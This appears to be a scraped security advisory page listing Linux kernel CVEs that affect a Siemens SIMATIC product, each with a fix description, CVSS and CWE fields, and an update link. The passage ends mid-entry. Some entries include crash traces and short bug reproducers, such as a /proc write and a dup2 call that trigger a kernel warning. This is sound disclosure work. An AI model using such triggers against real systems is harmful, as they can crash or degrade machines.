Wrong Factors Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39702 In the Linux kernel, the following vulnerability has been resolved: ipv6: sr: Fix MAC comparison to be constant-time To prevent timing attacks, MACs need to be compared in constant time. Use the appropriate helper function for this. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-208 Observable Timing Discrepancy Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H CVE-2025-39703 In the Linux kernel, the following vulnerability has been resolved: net, hsr: reject HSR frame if skb can't hold tag Receiving HSR frame with insufficient space to hold HSR tag in the skb can result in a crash (kernel BUG): [ 45.390915] skbuff: skb_under_panic: text:ffffffff86f32cac len:26 put:14 head:ffff888042418000 data:ffff888042417ff4 tail:0xe end:0x180 dev:bridge_slave_1 [ 45.392559] ------------[ cut here ]------------ [ 45.392912] kernel BUG at net/core/skbuff.c:211! [ 45.393276] Oops: invalid opcode: 0000 [#1] SMP DEBUG_PAGEALLOC KASAN NOPTI [ 45.393809] CPU: 1 UID: 0 PID: 2496 Comm: reproducer Not tainted 6.15.0 #12 PREEMPT(undef) [ 45.394433] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 [ 45.395273] RIP: 0010:skb_panic+0x15b/0x1d0 [ 45.402911] Call Trace: [ 45.403105] [ 45.404470] skb_push+0xcd/0xf0 [ 45.404726] br_dev_queue_push_xmit+0x7c/0x6c0 [ 45.406513] br_forward_finish+0x128/0x260 [ 45.408483] __br_forward+0x42d/0x590 [ 45.409464] maybe_deliver+0x2eb/0x420 [ 45.409763] br_flood+0x174/0x4a0 [ 45.410030] br_handle_frame_finish+0xc7c/0x1bc0 [ 45.411618] br_handle_frame+0xac3/0x1230 [ 45.413674] __netif_receive_skb_core.constprop.0+0x808/0x3df0 [ 45.422966] __netif_receive_skb_one_core+0xb4/0x1f0 [ 45.424478] __netif_receive_skb+0x22/0x170 [ 45.424806] process_backlog+0x242/0x6d0 [ 45.425116] __napi_poll+0xbb/0x630 [ 45.425394] net_rx_action+0x4d1/0xcc0 [ 45.427613] handle_softirqs+0x1a4/0x580 [ 45.427926] do_softirq+0x74/0x90 [ 45.428196] This issue was found by syzkaller. The panic happens in br_dev_queue_push_xmit() once it receives a corrupted skb with ETH header already pushed in linear data. When it attempts the skb_push() call, there's not enough headroom and skb_push() panics. The corrupted skb is put on the queue by HSR layer, which makes a sequence of unintended transformations when it receives a specific corrupted HSR frame (with incomplete TAG). Fix it by dropping and consuming frames that are not long enough to contain both ethernet and hsr headers. Alternative fix would be to check for enough headroom before skb_push() in br_dev_queue_push_xmit(). In the reproducer, this is injected via AF_PACKET, but I don't easily see why it couldn't be sent over the wire from adjacent network. Further Details: In the reproducer, the following network interface chain is set up: ┌────────────────┐ ┌────────────────┐ │ veth0_to_hsr ├───┤ hsr_slave0 ┼───┐ └────────────────┘ └────────────────┘ │ │ ┌──────┐ ├─┤ hsr0 ├───┐ │ └──────┘ │ ┌────────────────┐ ┌────────────────┐ │ │┌────────┐ │ veth1_to_hsr ┼───┤ hsr_slave1 ├───┘ └┤ │ └────────────────┘ └────────────────┘ ┌┼ bridge │ ││ │ │└────────┘ │ ┌───────┐ │ │ ... ├──────┘ └───────┘ To trigger the events leading up to crash, reproducer sends a corrupted HSR fr ---truncated--- View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-1286 Improper Validation of Syntactic Correctness of Input Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-39706 In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Destroy KFD debugfs after destroy KFD wq Since KFD proc content was moved to kernel debugfs, we can't destroy KFD debugfs before kfd_process_destroy_wq. Move kfd_process_destroy_wq prior to kfd_debugfs_fini to fix a kernel NULL pointer problem. It happens when /sys/kernel/debug/kfd was already destroyed in kfd_debugfs_fini but kfd_process_destroy_wq calls kfd_debugfs_remove_process. This line debugfs_remove_recursive(entry->proc_dentry); tries to remove /sys/kernel/debug/kfd/proc/ while /sys/kernel/debug/kfd is already gone. It hangs the kernel by kernel NULL pointer. (cherry picked from commit 0333052d90683d88531558dcfdbf2525cc37c233) View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39709 In the Linux kernel, the following vulnerability has been resolved: media: venus: protect against spurious interrupts during probe Make sure the interrupt handler is initialized before the interrupt is registered. If the IRQ is registered before hfi_create(), it's possible that an interrupt fires before the handler setup is complete, leading to a NULL dereference. This error condition has been observed during system boot on Rb3Gen2. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39710 In the Linux kernel, the following vulnerability has been resolved: media: venus: Add a check for packet size after reading from shared memory Add a check to ensure that the packet size does not exceed the number of available words after reading the packet header from shared memory. This ensures that the size provided by the firmware is safe to process and prevent potential out-of-bounds memory access. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39713 In the Linux kernel, the following vulnerability has been resolved: media: rainshadow-cec: fix TOCTOU race condition in rain_interrupt() In the interrupt handler rain_interrupt(), the buffer full check on rain->buf_len is performed before acquiring rain->buf_lock. This creates a Time-of-Check to Time-of-Use (TOCTOU) race condition, as rain->buf_len is concurrently accessed and modified in the work handler rain_irq_work_handler() under the same lock. Multiple interrupt invocations can race, with each reading buf_len before it becomes full and then proceeding. This can lead to both interrupts attempting to write to the buffer, incrementing buf_len beyond its capacity (DATA_SIZE) and causing a buffer overflow. Fix this bug by moving the spin_lock() to before the buffer full check. This ensures that the check and the subsequent buffer modification are performed atomically, preventing the race condition. An corresponding spin_unlock() is added to the overflow path to correctly release the lock. This possible bug was found by an experimental static analysis tool developed by our team. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39714 In the Linux kernel, the following vulnerability has been resolved: media: usbtv: Lock resolution while streaming When an program is streaming (ffplay) and another program (qv4l2) changes the TV standard from NTSC to PAL, the kernel crashes due to trying to copy to unmapped memory. Changing from NTSC to PAL increases the resolution in the usbtv struct, but the video plane buffer isn't adjusted, so it overflows. [hverkuil: call vb2_is_busy instead of vb2_is_streaming] View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39715 In the Linux kernel, the following vulnerability has been resolved: parisc: Revise gateway LWS calls to probe user read access We use load and stbys,e instructions to trigger memory reference interruptions without writing to memory. Because of the way read access support is implemented, read access interruptions are only triggered at privilege levels 2 and 3. The kernel and gateway page execute at privilege level 0, so this code never triggers a read access interruption. Thus, it is currently possible for user code to execute a LWS compare and swap operation at an address that is read protected at privilege level 3 (PRIV_USER). Fix this by probing read access rights at privilege level 3 and branching to lws_fault if access isn't allowed. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39716 In the Linux kernel, the following vulnerability has been resolved: parisc: Revise __get_user() to probe user read access Because of the way read access support is implemented, read access interruptions are only triggered at privilege levels 2 and 3. The kernel executes at privilege level 0, so __get_user() never triggers a read access interruption (code 26). Thus, it is currently possible for user code to access a read protected address via a system call. Fix this by probing read access rights at privilege level 3 (PRIV_USER) and setting __gu_err to -EFAULT (-14) if access isn't allowed. Note the cmpiclr instruction does a 32-bit compare because COND macro doesn't work inside asm. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39718 In the Linux kernel, the following vulnerability has been resolved: vsock/virtio: Validate length in packet header before skb_put() When receiving a vsock packet in the guest, only the virtqueue buffer size is validated prior to virtio_vsock_skb_rx_put(). Unfortunately, virtio_vsock_skb_rx_put() uses the length from the packet header as the length argument to skb_put(), potentially resulting in SKB overflow if the host has gone wonky. Validate the length as advertised by the packet header before calling virtio_vsock_skb_rx_put(). View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.6 HIGH CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H CVE-2025-39719 In the Linux kernel, the following vulnerability has been resolved: iio: imu: bno055: fix OOB access of hw_xlate array Fix a potential out-of-bounds array access of the hw_xlate array in bno055.c. In bno055_get_regmask(), hw_xlate was iterated over the length of the vals array instead of the length of the hw_xlate array. In the case of bno055_gyr_scale, the vals array is larger than the hw_xlate array, so this could result in an out-of-bounds access. In practice, this shouldn't happen though because a match should always be found which breaks out of the for loop before it iterates beyond the end of the hw_xlate array. By adding a new hw_xlate_len field to the bno055_sysfs_attr, we can be sure we are iterating over the correct length. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39724 In the Linux kernel, the following vulnerability has been resolved: serial: 8250: fix panic due to PSLVERR When the PSLVERR_RESP_EN parameter is set to 1, the device generates an error response if an attempt is made to read an empty RBR (Receive Buffer Register) while the FIFO is enabled. In serial8250_do_startup(), calling serial_port_out(port, UART_LCR, UART_LCR_WLEN8) triggers dw8250_check_lcr(), which invokes dw8250_force_idle() and serial8250_clear_and_reinit_fifos(). The latter function enables the FIFO via serial_out(p, UART_FCR, p->fcr). Execution proceeds to the serial_port_in(port, UART_RX). This satisfies the PSLVERR trigger condition. When another CPU (e.g., using printk()) is accessing the UART (UART is busy), the current CPU fails the check (value & ~UART_LCR_SPAR) == (lcr & ~UART_LCR_SPAR) in dw8250_check_lcr(), causing it to enter dw8250_force_idle(). Put serial_port_out(port, UART_LCR, UART_LCR_WLEN8) under the port->lock to fix this issue. Panic backtrace: [ 0.442336] Oops - unknown exception [#1] [ 0.442343] epc : dw8250_serial_in32+0x1e/0x4a [ 0.442351] ra : serial8250_do_startup+0x2c8/0x88e ... [ 0.442416] console_on_rootfs+0x26/0x70 View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39736 In the Linux kernel, the following vulnerability has been resolved: mm/kmemleak: avoid deadlock by moving pr_warn() outside kmemleak_lock When netpoll is enabled, calling pr_warn_once() while holding kmemleak_lock in mem_pool_alloc() can cause a deadlock due to lock inversion with the netconsole subsystem. This occurs because pr_warn_once() may trigger netpoll, which eventually leads to __alloc_skb() and back into kmemleak code, attempting to reacquire kmemleak_lock. This is the path for the deadlock. mem_pool_alloc() -> raw_spin_lock_irqsave(&kmemleak_lock, flags); -> pr_warn_once() -> netconsole subsystem -> netpoll -> __alloc_skb -> __create_object -> raw_spin_lock_irqsave(&kmemleak_lock, flags); Fix this by setting a flag and issuing the pr_warn_once() after kmemleak_lock is released. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-833 Deadlock Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39737 In the Linux kernel, the following vulnerability has been resolved: mm/kmemleak: avoid soft lockup in __kmemleak_do_cleanup() A soft lockup warning was observed on a relative small system x86-64 system with 16 GB of memory when running a debug kernel with kmemleak enabled. watchdog: BUG: soft lockup - CPU#8 stuck for 33s! [kworker/8:1:134] The test system was running a workload with hot unplug happening in parallel. Then kemleak decided to disable itself due to its inability to allocate more kmemleak objects. The debug kernel has its CONFIG_DEBUG_KMEMLEAK_MEM_POOL_SIZE set to 40,000. The soft lockup happened in kmemleak_do_cleanup() when the existing kmemleak objects were being removed and deleted one-by-one in a loop via a workqueue. In this particular case, there are at least 40,000 objects that need to be processed and given the slowness of a debug kernel and the fact that a raw_spinlock has to be acquired and released in __delete_object(), it could take a while to properly handle all these objects. As kmemleak has been disabled in this case, the object removal and deletion process can be further optimized as locking isn't really needed. However, it is probably not worth the effort to optimize for such an edge case that should rarely happen. So the simple solution is to call cond_resched() at periodic interval in the iteration loop to avoid soft lockup. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39738 In the Linux kernel, the following vulnerability has been resolved: btrfs: do not allow relocation of partially dropped subvolumes [BUG] There is an internal report that balance triggered transaction abort, with the following call trace: item 85 key (594509824 169 0) itemoff 12599 itemsize 33 extent refs 1 gen 197740 flags 2 ref#0: tree block backref root 7 item 86 key (594558976 169 0) itemoff 12566 itemsize 33 extent refs 1 gen 197522 flags 2 ref#0: tree block backref root 7 ... BTRFS error (device loop0): extent item not found for insert, bytenr 594526208 num_bytes 16384 parent 449921024 root_objectid 934 owner 1 offset 0 BTRFS error (device loop0): failed to run delayed ref for logical 594526208 num_bytes 16384 type 182 action 1 ref_mod 1: -117 ------------[ cut here ]------------ BTRFS: Transaction aborted (error -117) WARNING: CPU: 1 PID: 6963 at ../fs/btrfs/extent-tree.c:2168 btrfs_run_delayed_refs+0xfa/0x110 [btrfs] And btrfs check doesn't report anything wrong related to the extent tree. [CAUSE] The cause is a little complex, firstly the extent tree indeed doesn't have the backref for 594526208. The extent tree only have the following two backrefs around that bytenr on-disk: item 65 key (594509824 METADATA_ITEM 0) itemoff 13880 itemsize 33 refs 1 gen 197740 flags TREE_BLOCK tree block skinny level 0 (176 0x7) tree block backref root CSUM_TREE item 66 key (594558976 METADATA_ITEM 0) itemoff 13847 itemsize 33 refs 1 gen 197522 flags TREE_BLOCK tree block skinny level 0 (176 0x7) tree block backref root CSUM_TREE But the such missing backref item is not an corruption on disk, as the offending delayed ref belongs to subvolume 934, and that subvolume is being dropped: item 0 key (934 ROOT_ITEM 198229) itemoff 15844 itemsize 439 generation 198229 root_dirid 256 bytenr 10741039104 byte_limit 0 bytes_used 345571328 last_snapshot 198229 flags 0x1000000000001(RDONLY) refs 0 drop_progress key (206324 EXTENT_DATA 2711650304) drop_level 2 level 2 generation_v2 198229 And that offending tree block 594526208 is inside the dropped range of that subvolume. That explains why there is no backref item for that bytenr and why btrfs check is not reporting anything wrong. But this also shows another problem, as btrfs will do all the orphan subvolume cleanup at a read-write mount. So half-dropped subvolume should not exist after an RW mount, and balance itself is also exclusive to subvolume cleanup, meaning we shouldn't hit a subvolume half-dropped during relocation. The root cause is, there is no orphan item for this subvolume. In fact there are 5 subvolumes from around 2021 that have the same problem. It looks like the original report has some older kernels running, and caused those zombie subvolumes. Thankfully upstream commit 8d488a8c7ba2 ("btrfs: fix subvolume/snapshot deletion not triggered on mount") has long fixed the bug. [ENHANCEMENT] For repairing such old fs, btrfs-progs will be enhanced. Considering how delayed the problem will show up (at run delayed ref time) and at that time we have to abort transaction already, it is too late. Instead here we reject any half-dropped subvolume for reloc tree at the earliest time, preventing confusion and extra time wasted on debugging similar bugs. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39742 In the Linux kernel, the following vulnerability has been resolved: RDMA: hfi1: fix possible divide-by-zero in find_hw_thread_mask() The function divides number of online CPUs by num_core_siblings, and later checks the divider by zero. This implies a possibility to get and divide-by-zero runtime error. Fix it by moving the check prior to division. This also helps to save one indentation level. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-369 Divide By Zero Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39743 In the Linux kernel, the following vulnerability has been resolved: jfs: truncate good inode pages when hard link is 0 The fileset value of the inode copy from the disk by the reproducer is AGGR_RESERVED_I. When executing evict, its hard link number is 0, so its inode pages are not truncated. This causes the bugon to be triggered when executing clear_inode() because nrpages is greater than 0. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39749 In the Linux kernel, the following vulnerability has been resolved: rcu: Protect ->defer_qs_iw_pending from data race On kernels built with CONFIG_IRQ_WORK=y, when rcu_read_unlock() is invoked within an interrupts-disabled region of code [1], it will invoke rcu_read_unlock_special(), which uses an irq-work handler to force the system to notice when the RCU read-side critical section actually ends. That end won't happen until interrupts are enabled at the soonest. In some kernels, such as those booted with rcutree.use_softirq=y, the irq-work handler is used unconditionally. The per-CPU rcu_data structure's ->defer_qs_iw_pending field is updated by the irq-work handler and is both read and updated by rcu_read_unlock_special(). This resulted in the following KCSAN splat: ------------------------------------------------------------------------ BUG: KCSAN: data-race in rcu_preempt_deferred_qs_handler / rcu_read_unlock_special read to 0xffff96b95f42d8d8 of 1 bytes by task 90 on cpu 8: rcu_read_unlock_special+0x175/0x260 __rcu_read_unlock+0x92/0xa0 rt_spin_unlock+0x9b/0xc0 __local_bh_enable+0x10d/0x170 __local_bh_enable_ip+0xfb/0x150 rcu_do_batch+0x595/0xc40 rcu_cpu_kthread+0x4e9/0x830 smpboot_thread_fn+0x24d/0x3b0 kthread+0x3bd/0x410 ret_from_fork+0x35/0x40 ret_from_fork_asm+0x1a/0x30 write to 0xffff96b95f42d8d8 of 1 bytes by task 88 on cpu 8: rcu_preempt_deferred_qs_handler+0x1e/0x30 irq_work_single+0xaf/0x160 run_irq_workd+0x91/0xc0 smpboot_thread_fn+0x24d/0x3b0 kthread+0x3bd/0x410 ret_from_fork+0x35/0x40 ret_from_fork_asm+0x1a/0x30 no locks held by irq_work/8/88. irq event stamp: 200272 hardirqs last enabled at (200272): [] finish_task_switch+0x131/0x320 hardirqs last disabled at (200271): [] __schedule+0x129/0xd70 softirqs last enabled at (0): [] copy_process+0x4df/0x1cc0 softirqs last disabled at (0): [] 0x0 ------------------------------------------------------------------------ The problem is that irq-work handlers run with interrupts enabled, which means that rcu_preempt_deferred_qs_handler() could be interrupted, and that interrupt handler might contain an RCU read-side critical section, which might invoke rcu_read_unlock_special(). In the strict KCSAN mode of operation used by RCU, this constitutes a data race on the ->defer_qs_iw_pending field. This commit therefore disables interrupts across the portion of the rcu_preempt_deferred_qs_handler() that updates the ->defer_qs_iw_pending field. This suffices because this handler is not a fast path. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39752 In the Linux kernel, the following vulnerability has been resolved: ARM: rockchip: fix kernel hang during smp initialization In order to bring up secondary CPUs main CPU write trampoline code to SRAM. The trampoline code is written while secondary CPUs are powered on (at least that true for RK3188 CPU). Sometimes that leads to kernel hang. Probably because secondary CPU execute trampoline code while kernel doesn't expect. The patch moves SRAM initialization step to the point where all secondary CPUs are powered down. That fixes rarely hangs on RK3188: [ 0.091568] CPU0: thread -1, cpu 0, socket 0, mpidr 80000000 [ 0.091996] rockchip_smp_prepare_cpus: ncores 4 View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-364 Signal Handler Race Condition Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39756 In the Linux kernel, the following vulnerability has been resolved: fs: Prevent file descriptor table allocations exceeding INT_MAX When sysctl_nr_open is set to a very high value (for example, 1073741816 as set by systemd), processes attempting to use file descriptors near the limit can trigger massive memory allocation attempts that exceed INT_MAX, resulting in a WARNING in mm/slub.c: WARNING: CPU: 0 PID: 44 at mm/slub.c:5027 __kvmalloc_node_noprof+0x21a/0x288 This happens because kvmalloc_array() and kvmalloc() check if the requested size exceeds INT_MAX and emit a warning when the allocation is not flagged with __GFP_NOWARN. Specifically, when nr_open is set to 1073741816 (0x3ffffff8) and a process calls dup2(oldfd, 1073741880), the kernel attempts to allocate: - File descriptor array: 1073741880 * 8 bytes = 8,589,935,040 bytes - Multiple bitmaps: ~400MB - Total allocation size: > 8GB (exceeding INT_MAX = 2,147,483,647) Reproducer: 1. Set /proc/sys/fs/nr_open to 1073741816: # echo 1073741816 > /proc/sys/fs/nr_open 2. Run a program that uses a high file descriptor: #include #include int main() { struct rlimit rlim = {1073741824, 1073741824}; setrlimit(RLIMIT_NOFILE, &rlim); dup2(2, 1073741880); // Triggers the warning return 0; } 3. Observe WARNING in dmesg at mm/slub.c:5027 systemd commit a8b627a introduced automatic bumping of fs.nr_open to the maximum possible value. The rationale was that systems with memory control groups (memcg) no longer need separate file descriptor limits since memory is properly accounted. However, this change overlooked that: 1. The kernel's allocation functions still enforce INT_MAX as a maximum size regardless of memcg accounting 2. Programs and tests that legitimately test file descriptor limits can inadvertently trigger massive allocations 3. The resulting allocations (>8GB) are impractical and will always fail systemd's algorithm starts with INT_MAX and keeps halving the value until the kernel accepts it. On most systems, this results in nr_open being set to 1073741816 (0x3ffffff8), which is just under 1GB of file descriptors. While processes rarely use file descriptors near this limit in normal operation, certain selftests (like tools/testing/selftests/core/unshare_test.c) and programs that test file descriptor limits can trigger this issue. Fix this by adding a check in alloc_fdtable() to ensure the requested allocation size does not exceed INT_MAX. This causes the operation to fail with -EMFILE instead of triggering a kernel warning and avoids the impractical >8GB memory allocation request. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-401 Missing Release of Memory after Effective Lifetime Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39757 In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Validate UAC3 cluster segment descriptors UAC3 class segment descriptors need to be verified whether their sizes match with the declared lengths and whether they fit with the allocated buffer sizes, too. Otherwise malicious firmware may lead to the unexpected OOB accesses. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H CVE-2025-39759 In the Linux kernel, the following vulnerability has been resolved: btrfs: qgroup: fix race between quota disable and quota rescan ioctl There's a race between a task disabling quotas and another running the rescan ioctl that can result in a use-after-free of qgroup records from the fs_info->qgroup_tree rbtree. This happens as follows: 1) Task A enters btrfs_ioctl_quota_rescan() -> btrfs_qgroup_rescan(); 2) Task B enters btrfs_quota_disable() and calls btrfs_qgroup_wait_for_completion(), which does nothing because at that point fs_info->qgroup_rescan_running is false (it wasn't set yet by task A); 3) Task B calls btrfs_free_qgroup_config() which starts freeing qgroups from fs_info->qgroup_tree without taking the lock fs_info->qgroup_lock; 4) Task A enters qgroup_rescan_zero_tracking() which starts iterating the fs_info->qgroup_tree tree while holding fs_info->qgroup_lock, but task B is freeing qgroup records from that tree without holding the lock, resulting in a use-after-free. Fix this by taking fs_info->qgroup_lock at btrfs_free_qgroup_config(). Also at btrfs_qgroup_rescan() don't start the rescan worker if quotas were already disabled. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39760 In the Linux kernel, the following vulnerability has been resolved: usb: core: config: Prevent OOB read in SS endpoint companion parsing usb_parse_ss_endpoint_companion() checks descriptor type before length, enabling a potentially odd read outside of the buffer size. Fix this up by checking the size first before looking at any of the fields in the descriptor. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39766 In the Linux kernel, the following 